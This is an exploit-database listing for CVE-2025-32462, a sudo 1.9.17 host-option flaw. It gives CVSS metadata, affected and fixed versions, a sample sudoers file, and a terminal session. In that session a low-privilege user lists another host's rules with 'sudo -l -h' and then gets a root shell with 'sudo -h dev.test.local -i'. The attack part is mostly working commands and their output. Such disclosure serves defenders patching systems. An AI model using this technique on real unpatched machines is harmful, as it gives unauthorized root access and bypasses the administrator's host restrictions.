Sudo 1.9.17 Host Option – Elevation of Privilege

July 8, 2025 invoker category_exploit

Exploit Details

Basic Information

Exploit Title Sudo 1.9.17 Host Option – Elevation of Privilege
Exploit ID EDB-ID:52354
Type exploitdb
Published 2025-07-08T00:00:00
Modified 2025-07-08T00:00:00

CVSS Information

CVSS Score 2.8
Severity LOW
Vector CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:N/I:L/A:N

CVE Information

  • CVE-2025-32462

Exploit Description

Exploit Title: Sudo 1.9.17 Host Option – Elevation of Privilege Date:…

Exploit Code

# Exploit Title: Sudo 1.9.17 Host Option – Elevation of Privilege

# Date: 2025-06-30

# Exploit Author: Rich Mirch

# Vendor Homepage: https://www.sudo.ws

# Software Link: https://www.sudo.ws/dist/sudo-1.9.17.tar.gz

# Version: Stable 1.9.0 – 1.9.17, Legacy 1.8.8 – 1.8.32

# Fixed in: 1.9.17p1

# Vendor Advisory: https://www.sudo.ws/security/advisories/host_any

# Blog:

https://www.stratascale.com/vulnerability-alert-CVE-2025-32462-sudo-host

# Tested on: Ubuntu 24.04.1; Sudo 1.9.15p5, macOS Sequoia 15.3.2; Sudo

1.9.13p2

# CVE : CVE-2025-32462

#

No exploit is required. Executing a sudo or sudoedit command with the host

option referencing an unrelated remote host rule causes Sudo to treat the

rule as valid for the local system. As a result, any command allowed by the

remote host rule can be executed on the local machine.

Example /etc/sudoers file using the Host_Alias directive. The lowpriv user

is allowed to execute all commands (full root) on dev.test.local,

ci.test.local, but not prod.test.local.

Host_Alias SERVERS = prod.test.local, dev.test.local

Host_Alias PROD = prod.test.local

lowpriv SERVERS, !PROD = NOPASSWD:ALL

lowpriv ci.test.local = NOPASSWD:ALL

Even though the prod.test.local server is explicitly denied for the lowpriv

user, root access is achieved by specifying the host option for the

dev.test.local or ci.test.local servers.

Example

Show that lowpriv is not allowed to execute sudo on the prod server.

lowpriv@prod:~$ id

uid=1001(lowpriv) gid=1001(lowpriv) groups=1001(lowpriv)

lowpriv@prod:~$ sudo -l

[sudo] password for lowpriv:

Sorry, user lowpriv may not run sudo on prod.

List the host rules for the dev.test.local server.

lowpriv@prod:~$ sudo -l -h dev.test.local

Matching Defaults entries for lowpriv on dev:

env_reset, mail_badpass,

secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,

use_pty

User lowpriv may run the following commands on dev:

(root) NOPASSWD: ALL

Execute a root shell on prod.test.local by specifying the -h dev.test.local

option.

lowpriv@prod:~$ sudo -h dev.test.local -i

sudo: a remote host may only be specified when listing privileges.

root@prod:~# id

uid=0(root) gid=0(root) groups=0(root)

View Full Exploit Details

💭 Join the Security Discussion

🔒 Your email address will not be published. Required fields are marked *

⚠️ Please be respectful and constructive in your comments. Security discussions should remain professional.